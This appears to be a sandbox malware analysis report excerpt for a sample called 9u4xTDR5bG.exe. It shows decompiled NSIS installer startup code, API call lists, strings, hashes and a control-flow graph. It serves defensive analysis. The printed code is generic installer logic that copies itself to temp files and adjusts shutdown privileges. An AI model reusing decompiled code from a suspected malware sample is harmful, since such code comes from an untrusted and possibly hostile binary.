                                                  				E0040653D(_t233, _t92);
                                                  				_t94 = _t233;
                                                  				_t234 = 0x22;
                                                  				 *0x434f00 = 0x400000;
                                                  				_t251 = L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" " - _t234; // 0x22
                                                  				if(_t251 == 0) {
                                                  					_t217 = _t234;
                                                  					_t94 =  &M00440002;
                                                  				}
                                                  				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                  				_v16 = _t199;
                                                  				while(1) {
                                                  					_t97 =  *_t199;
                                                  					_t252 = _t97 - _t189;
                                                  					if(_t97 == _t189) {
                                                  						break;
                                                  					}
                                                  					_t210 = 0x20;
                                                  					__eflags = _t97 - _t210;
                                                  					if(_t97 != _t210) {
                                                  						L17:
                                                  						__eflags =  *_t199 - _t234;
                                                  						_v12 = _t210;
                                                  						if( *_t199 == _t234) {
                                                  							_v12 = _t234;
                                                  							_t199 = _t199 + 2;
                                                  							__eflags = _t199;
                                                  						}
                                                  						__eflags =  *_t199 - 0x2f;
                                                  						if( *_t199 != 0x2f) {
                                                  							L32:
                                                  							_t199 = E00405E39(_t199, _v12);
                                                  							__eflags =  *_t199 - _t234;
                                                  							if(__eflags == 0) {
                                                  								_t199 = _t199 + 2;
                                                  								__eflags = _t199;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							_t199 = _t199 + 2;
                                                  							__eflags =  *_t199 - 0x53;
                                                  							if( *_t199 != 0x53) {
                                                  								L24:
                                                  								asm("cdq");
                                                  								asm("cdq");
                                                  								_t215 = L"NCRC" & 0x0000ffff;
                                                  								asm("cdq");
                                                  								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                  								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                  								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                  									L29:
                                                  									asm("cdq");
                                                  									asm("cdq");
                                                  									_t210 = L" /D=" & 0x0000ffff;
                                                  									asm("cdq");
                                                  									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                  									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                  									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                  										L31:
                                                  										_t234 = 0x22;
                                                  										goto L32;
                                                  									}
                                                  									__eflags =  *_t199 - _t230;
                                                  									if( *_t199 == _t230) {
                                                  										 *(_t199 - 4) = _t189;
                                                  										__eflags = _t199;
                                                  										E0040653D(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t199);
                                                  										L37:
                                                  										_t235 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                  										GetTempPathW(0x400, _t235);
                                                  										_t116 = E004034FC(_t199, _t252);
                                                  										_t253 = _t116;
                                                  										if(_t116 != 0) {
                                                  											L40:
                                                  											DeleteFileW(L"1033"); // executed
                                                  											_t118 = E0040307D(_t255, _v20); // executed
                                                  											_v8 = _t118;
                                                  											if(_t118 != _t189) {
                                                  												L68:
                                                  												E00403B12();
                                                  												__imp__OleUninitialize();
                                                  												if(_v8 == _t189) {
                                                  													if( *0x434f94 == _t189) {
                                                  														L77:
                                                  														_t120 =  *0x434fac;
                                                  														if(_t120 != 0xffffffff) {
                                                  															_v24 = _t120;
                                                  														}
                                                  														ExitProcess(_v24);
                                                  													}
                                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                  														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                  														_v40.PrivilegeCount = 1;
                                                  														_v28 = 2;
                                                  														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                  													}
                                                  													_t124 = E0040690A(4);
                                                  													if(_t124 == _t189) {
                                                  														L75:
                                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                  															goto L77;
                                                  														}
                                                  														goto L76;
                                                  													} else {
                                                  														_push(0x80040002);
                                                  														_push(0x25);
                                                  														_push(_t189);
                                                  														_push(_t189);
                                                  														_push(_t189);
                                                  														if( *_t124() == 0) {
                                                  															L76:
                                                  															E0040140B(9);
                                                  															goto L77;
                                                  														}
                                                  														goto L75;
                                                  													}
                                                  												}
                                                  												E00405B9D(_v8, 0x200010);
                                                  												ExitProcess(2);
                                                  											}
                                                  											if( *0x434f1c == _t189) {
                                                  												L51:
                                                  												 *0x434fac =  *0x434fac | 0xffffffff;
                                                  												_v24 = E00403BEC(_t265);
                                                  												goto L68;
                                                  											}
                                                  											_t219 = E00405E39(L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" ", _t189);
                                                  											if(_t219 < L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" ") {
                                                  												L48:
                                                  												_t264 = _t219 - L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" ";
                                                  												_v8 = L"Error launching installer";
                                                  												if(_t219 < L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" ") {
                                                  													_t190 = E00405B08(__eflags);
                                                  													lstrcatW(_t235, L"~nsu");
                                                  													__eflags = _t190;
                                                  													if(_t190 != 0) {
                                                  														lstrcatW(_t235, "A");
                                                  													}
                                                  													lstrcatW(_t235, L".tmp");
                                                  													_t138 = lstrcmpiW(_t235, 0x441800);
                                                  													__eflags = _t138;
                                                  													if(_t138 == 0) {
                                                  														L67:
                                                  														_t189 = 0;
                                                  														__eflags = 0;
                                                  														goto L68;
                                                  													} else {
                                                  														__eflags = _t190;
                                                  														_push(_t235);
                                                  														if(_t190 == 0) {
                                                  															E00405AEB();
                                                  														} else {
                                                  															E00405A6E();
                                                  														}
                                                  														SetCurrentDirectoryW(_t235);
                                                  														__eflags = L"C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                                                  														if(__eflags == 0) {
                                                  															E0040653D(L"C:\\Users\\alfons\\AppData\\Local\\Temp", 0x441800);
                                                  														}
                                                  														E0040653D(0x436000, _v16);
                                                  														_t202 = "A" & 0x0000ffff;
                                                  														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                  														__eflags = _t144;
                                                  														_v12 = 0x1a;
                                                  														 *0x436800 = _t144;
                                                  														do {
                                                  															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                  															DeleteFileW(0x42aa28);
                                                  															__eflags = _v8;
                                                  															if(_v8 != 0) {
                                                  																_t149 = CopyFileW(L"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe", 0x42aa28, 1);
                                                  																__eflags = _t149;
                                                  																if(_t149 != 0) {
                                                  																	E004062FD(_t202, 0x42aa28, 0);
                                                  																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                  																	_t153 = E00405B20(0x42aa28);
                                                  																	__eflags = _t153;
                                                  																	if(_t153 != 0) {
                                                  																		CloseHandle(_t153);
                                                  																		_v8 = 0;
                                                  																	}
                                                  																}
                                                  															}
                                                  															 *0x436800 =  *0x436800 + 1;
                                                  															_t61 =  &_v12;
                                                  															 *_t61 = _v12 - 1;
                                                  															__eflags =  *_t61;
                                                  														} while ( *_t61 != 0);
                                                  														E004062FD(_t202, _t235, 0);
                                                  														goto L67;
                                                  													}
                                                  												}
                                                  												 *_t219 = _t189;
                                                  												_t222 =  &(_t219[2]);
                                                  												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                  												_t265 = _t158;
                                                  												if(_t158 == 0) {
                                                  													goto L68;
                                                  												}
                                                  												E0040653D(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t222);
                                                  												E0040653D(0x441000, _t222);
                                                  												_v8 = _t189;
                                                  												goto L51;
                                                  											}
                                                  											asm("cdq");
                                                  											asm("cdq");
                                                  											asm("cdq");
                                                  											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                  											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                  											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                  												_t219 = _t219;
                                                  												if(_t219 >= L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" ") {
                                                  													continue;
                                                  												}
                                                  												break;
                                                  											}
                                                  											_t189 = 0;
                                                  											goto L48;
                                                  										}
                                                  										GetWindowsDirectoryW(_t235, 0x3fb);
                                                  										lstrcatW(_t235, L"\\Temp");
                                                  										_t171 = E004034FC(_t199, _t253);
                                                  										_t254 = _t171;
                                                  										if(_t171 != 0) {
                                                  											goto L40;
                                                  										}
                                                  										GetTempPathW(0x3fc, _t235);
                                                  										lstrcatW(_t235, L"Low");
                                                  										SetEnvironmentVariableW(L"TEMP", _t235);
                                                  										SetEnvironmentVariableW(L"TMP", _t235);
                                                  										_t176 = E004034FC(_t199, _t254);
                                                  										_t255 = _t176;
                                                  										if(_t176 == 0) {
                                                  											goto L68;
                                                  										}
                                                  										goto L40;
                                                  									}
                                                  									goto L31;
                                                  								}
                                                  								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                  								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                  									goto L29;
                                                  								}
                                                  								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                  								__eflags = _t178 - 0x20;
                                                  								if(_t178 == 0x20) {
                                                  									L28:
                                                  									_t36 =  &_v20;
                                                  									 *_t36 = _v20 | 0x00000004;
                                                  									__eflags =  *_t36;
                                                  									goto L29;
                                                  								}
                                                  								__eflags = _t178 - _t189;
                                                  								if(_t178 != _t189) {
                                                  									goto L29;
                                                  								}
                                                  								goto L28;
                                                  							}
                                                  							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                  							__eflags = _t179 - _t210;
                                                  							if(_t179 == _t210) {
                                                  								L23:
                                                  								 *0x434fa0 = 1;
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _t179 - _t189;
                                                  							if(_t179 != _t189) {
                                                  								goto L24;
                                                  							}
                                                  							goto L23;
                                                  						}
                                                  					} else {
                                                  						goto L16;
                                                  					}
                                                  					do {
                                                  						L16:
                                                  						_t199 = _t199 + 2;
                                                  						__eflags =  *_t199 - _t210;
                                                  					} while ( *_t199 == _t210);
                                                  					goto L17;
                                                  				}
                                                  				goto L37;
                                                  			}



















































                                                  0x0040353b
                                                  0x0040353c
                                                  0x00403543
                                                  0x00403546
                                                  0x0040354d
                                                  0x00403550
                                                  0x00403563
                                                  0x00403569
                                                  0x0040356c
                                                  0x0040356f
                                                  0x0040357d
                                                  0x00403585
                                                  0x00403590
                                                  0x004035a9
                                                  0x004035ab
                                                  0x004035b3
                                                  0x004035b3
                                                  0x004035be
                                                  0x004035c0
                                                  0x004035c0
                                                  0x004035d5
                                                  0x004035fa
                                                  0x00403608
                                                  0x0040360b
                                                  0x00403612
                                                  0x00403619
                                                  0x00403619
                                                  0x00403612
                                                  0x0040361b
                                                  0x00403620
                                                  0x00403621
                                                  0x0040362d
                                                  0x00403631
                                                  0x00403638
                                                  0x00403646
                                                  0x0040364b
                                                  0x00403652
                                                  0x00403656
                                                  0x0040365a
                                                  0x0040365c
                                                  0x0040365c
                                                  0x0040365a
                                                  0x00403663
                                                  0x0040366a
                                                  0x00403670
                                                  0x00403688
                                                  0x00403698
                                                  0x0040369d
                                                  0x004036a3
                                                  0x004036aa
                                                  0x004036b1
                                                  0x004036b3
                                                  0x004036b4
                                                  0x004036be
                                                  0x004036c5
                                                  0x004036c7
                                                  0x004036c9
                                                  0x004036c9
                                                  0x004036dc
                                                  0x004036de
                                                  0x004037d8
                                                  0x004037d8
                                                  0x004037db
                                                  0x004037de
                                                  0x00000000
                                                  0x00000000
                                                  0x004036e8
                                                  0x004036e9
                                                  0x004036ec
                                                  0x004036f5
                                                  0x004036f5
                                                  0x004036f8
                                                  0x004036fb
                                                  0x004036fe
                                                  0x00403701
                                                  0x00403701
                                                  0x00403701
                                                  0x00403702
                                                  0x00403706
                                                  0x004037c6
                                                  0x004037cf
                                                  0x004037d1
                                                  0x004037d4
                                                  0x004037d7
                                                  0x004037d7
                                                  0x004037d7
                                                  0x00000000
                                                  0x0040370c
                                                  0x0040370d
                                                  0x0040370e
                                                  0x00403712
                                                  0x0040372c
                                                  0x00403733
                                                  0x00403746
                                                  0x00403747
                                                  0x0040375c
                                                  0x00403761
                                                  0x00403763
                                                  0x00403765
                                                  0x00403781
                                                  0x00403788
                                                  0x0040379b
                                                  0x0040379c
                                                  0x004037b1
                                                  0x004037b7
                                                  0x004037b9
                                                  0x004037bb
                                                  0x004037c3
                                                  0x004037c5
                                                  0x00000000
                                                  0x004037c5
                                                  0x004037bf
                                                  0x004037c1
                                                  0x004037e6
                                                  0x004037ea
                                                  0x004037f3
                                                  0x004037f8
                                                  0x004037fe
                                                  0x00403809
                                                  0x0040380b
                                                  0x00403810
                                                  0x00403812
                                                  0x0040386a
                                                  0x0040386f
                                                  0x00403878
                                                  0x0040387f
                                                  0x00403882
                                                  0x00403a59
                                                  0x00403a59
                                                  0x00403a5e
                                                  0x00403a67
                                                  0x00403a84
                                                  0x00403afc
                                                  0x00403afc
                                                  0x00403b04
                                                  0x00403b06
                                                  0x00403b06
                                                  0x00403b0c
                                                  0x00403b0c
                                                  0x00403a9b
                                                  0x00403aa7
                                                  0x00403ab8
                                                  0x00403abf
                                                  0x00403ac6
                                                  0x00403ac6
                                                  0x00403ace
                                                  0x00403ada
                                                  0x00403ae8
                                                  0x00403af3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403adc
                                                  0x00403adc
                                                  0x00403add
                                                  0x00403adf
                                                  0x00403ae0
                                                  0x00403ae1
                                                  0x00403ae6
                                                  0x00403af5
                                                  0x00403af7
                                                  0x00000000
                                                  0x00403af7
                                                  0x00000000
                                                  0x00403ae6
                                                  0x00403ada
                                                  0x00403a71
                                                  0x00403a78
                                                  0x00403a78
                                                  0x0040388e
                                                  0x00403935
                                                  0x00403935
                                                  0x00403941
                                                  0x00000000
                                                  0x00403941
                                                  0x0040389f
                                                  0x004038a7
                                                  0x004038f9
                                                  0x004038f9
                                                  0x004038ff
                                                  0x00403906
                                                  0x00403954
                                                  0x00403956
                                                  0x0040395b
                                                  0x0040395d
                                                  0x00403965
                                                  0x00403965
                                                  0x00403970
                                                  0x0040397c
                                                  0x00403982
                                                  0x00403984
                                                  0x00403a57
                                                  0x00403a57
                                                  0x00403a57
                                                  0x00000000
                                                  0x0040398a
                                                  0x0040398a
                                                  0x0040398c
                                                  0x0040398d
                                                  0x00403996
                                                  0x0040398f
                                                  0x0040398f
                                                  0x0040398f
                                                  0x0040399c
                                                  0x004039a4
                                                  0x004039ab
                                                  0x004039b3
                                                  0x004039b3
                                                  0x004039c0
                                                  0x004039cc
                                                  0x004039d6
                                                  0x004039d6
                                                  0x004039d8
                                                  0x004039df
                                                  0x004039e9
                                                  0x004039f5
                                                  0x004039fb
                                                  0x00403a01
                                                  0x00403a04
                                                  0x00403a0e
                                                  0x00403a14
                                                  0x00403a16
                                                  0x00403a1a
                                                  0x00403a2b
                                                  0x00403a31
                                                  0x00403a36
                                                  0x00403a38
                                                  0x00403a3b
                                                  0x00403a41
                                                  0x00403a41
                                                  0x00403a38
                                                  0x00403a16
                                                  0x00403a44
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a52
                                                  0x00000000
                                                  0x00403a52
                                                  0x00403984
                                                  0x00403908
                                                  0x0040390b
                                                  0x0040390f
                                                  0x00403914
                                                  0x00403916
                                                  0x00000000
                                                  0x00000000
                                                  0x00403922
                                                  0x0040392d
                                                  0x00403932
                                                  0x00000000
                                                  0x00403932
                                                  0x004038b0
                                                  0x004038c8
                                                  0x004038d9
                                                  0x004038da
                                                  0x004038de
                                                  0x004038e0
                                                  0x004038ee
                                                  0x004038f5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004038f5
                                                  0x004038f7
                                                  0x00000000
                                                  0x004038f7
                                                  0x0040381a
                                                  0x00403826
                                                  0x0040382b
                                                  0x00403830
                                                  0x00403832
                                                  0x00000000
                                                  0x00000000
                                                  0x0040383a
                                                  0x00403842
                                                  0x00403853
                                                  0x0040385b
                                                  0x0040385d
                                                  0x00403862
                                                  0x00403864
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403864
                                                  0x00000000
                                                  0x004037c1
                                                  0x0040376a
                                                  0x0040376c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040376e
                                                  0x00403772
                                                  0x00403776
                                                  0x0040377d
                                                  0x0040377d
                                                  0x0040377d
                                                  0x0040377d
                                                  0x00000000
                                                  0x0040377d
                                                  0x00403778
                                                  0x0040377b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040377b
                                                  0x00403714
                                                  0x00403718
                                                  0x0040371b
                                                  0x00403722
                                                  0x00403722
                                                  0x00000000
                                                  0x00403722
                                                  0x0040371d
                                                  0x00403720
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403720
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004036ee
                                                  0x004036ee
                                                  0x004036ef
                                                  0x004036f0
                                                  0x004036f0
                                                  0x00000000
                                                  0x004036ee
                                                  0x00000000

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                  • GetVersionExW.KERNEL32(?), ref: 00403579
                                                  • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                  • OleInitialize.OLE32(00000000), ref: 0040366A
                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\9u4xTDR5bG.exe" ,00000020,"C:\Users\user\Desktop\9u4xTDR5bG.exe" ,00000000), ref: 004036D6
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                    • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\9u4xTDR5bG.exe" ,00000000,?), ref: 0040397C
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\9u4xTDR5bG.exe,0042AA28,00000001), ref: 00403A0E
                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                  • OleUninitialize.OLE32(?), ref: 00403A5E
                                                  • ExitProcess.KERNEL32 ref: 00403A78
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                  • ExitWindowsEx.USER32 ref: 00403AEB
                                                  • ExitProcess.KERNEL32 ref: 00403B0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                  • String ID: "C:\Users\user\Desktop\9u4xTDR5bG.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\9u4xTDR5bG.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3859024572-113760710
                                                  • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                  • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                  • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                  • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread FindCloseChangeNotification 144->147 148 4058b9-4058c6 144->148 166 4057e4-4057e7 145->166 167 4057c8-4057e2 SendMessageW * 2 145->167 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 163 405917-40591b 154->163 161 4058f8-405904 call 404472 155->161 162 40591e-40592e ShowWindow 155->162 156->154 159 40594a-405950 156->159 159->154 168 405952-405965 SendMessageW 159->168 161->154 164 405930-405939 call 40559f 162->164 165 40593e-40593f call 404472 162->165 164->165 165->156 172 4057f7-40580e call 404499 166->172 173 4057e9-4057f5 SendMessageW 166->173 167->166 174 405a67-405a69 168->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 168->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->163 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->174 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->174 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                  C-Code - Quality: 95%
                                                  			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                  				struct HWND__* _v8;
                                                  				long _v12;
                                                  				struct tagRECT _v28;
                                                  				void* _v36;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				int _v48;
                                                  				signed int _v52;
                                                  				int _v56;
                                                  				void* _v60;
                                                  				void* _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HWND__* _t94;
                                                  				long _t95;
                                                  				int _t100;
                                                  				void* _t108;
                                                  				intOrPtr _t119;
                                                  				void* _t127;
                                                  				intOrPtr _t130;
                                                  				struct HWND__* _t134;
                                                  				int _t156;
                                                  				int _t159;
                                                  				struct HMENU__* _t164;
                                                  				struct HWND__* _t168;
                                                  				struct HWND__* _t169;
                                                  				int _t171;
                                                  				void* _t172;
                                                  				short* _t173;
                                                  				short* _t175;
                                                  				int _t177;
                                                  
                                                  				_t169 =  *0x433ee4;
                                                  				_t156 = 0;
                                                  				_v8 = _t169;
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 == 0x405) {
                                                  						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                  						FindCloseChangeNotification(_t127); // executed
                                                  					}
                                                  					if(_a8 != 0x111) {
                                                  						L17:
                                                  						_t171 = 1;
                                                  						if(_a8 != 0x404) {
                                                  							L25:
                                                  							if(_a8 != 0x7b) {
                                                  								goto L20;
                                                  							}
                                                  							_t94 = _v8;
                                                  							if(_a12 != _t94) {
                                                  								goto L20;
                                                  							}
                                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                  							_a8 = _t95;
                                                  							if(_t95 <= _t156) {
                                                  								L36:
                                                  								return 0;
                                                  							}
                                                  							_t164 = CreatePopupMenu();
                                                  							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                  							_t100 = _a16;
                                                  							_t159 = _a16 >> 0x10;
                                                  							if(_a16 == 0xffffffff) {
                                                  								GetWindowRect(_v8,  &_v28);
                                                  								_t100 = _v28.left;
                                                  								_t159 = _v28.top;
                                                  							}
                                                  							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                  								_v60 = _t156;
                                                  								_v48 = 0x42d268;
                                                  								_v44 = 0x1000;
                                                  								_a4 = _a8;
                                                  								do {
                                                  									_a4 = _a4 - 1;
                                                  									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                  								} while (_a4 != _t156);
                                                  								OpenClipboard(_t156);
                                                  								EmptyClipboard();
                                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                  								_a4 = _t108;
                                                  								_t172 = GlobalLock(_t108);
                                                  								do {
                                                  									_v48 = _t172;
                                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                  									 *_t173 = 0xd;
                                                  									_t175 = _t173 + 2;
                                                  									 *_t175 = 0xa;
                                                  									_t172 = _t175 + 2;
                                                  									_t156 = _t156 + 1;
                                                  								} while (_t156 < _a8);
                                                  								GlobalUnlock(_a4);
                                                  								SetClipboardData(0xd, _a4);
                                                  								CloseClipboard();
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						if( *0x433ecc == _t156) {
                                                  							ShowWindow( *0x434f08, 8);
                                                  							if( *0x434f8c == _t156) {
                                                  								_t119 =  *0x42c240; // 0x7690e4
                                                  								_t57 = _t119 + 0x34; // 0xffffffd6
                                                  								E0040559F( *_t57, _t156);
                                                  							}
                                                  							E00404472(_t171);
                                                  							goto L25;
                                                  						}
                                                  						 *0x42ba38 = 2;
                                                  						E00404472(0x78);
                                                  						goto L20;
                                                  					} else {
                                                  						if(_a12 != 0x403) {
                                                  							L20:
                                                  							return E00404500(_a8, _a12, _a16);
                                                  						}
                                                  						ShowWindow( *0x433ed0, _t156);
                                                  						ShowWindow(_t169, 8);
                                                  						E004044CE(_t169);
                                                  						goto L17;
                                                  					}
                                                  				}
                                                  				_v52 = _v52 | 0xffffffff;
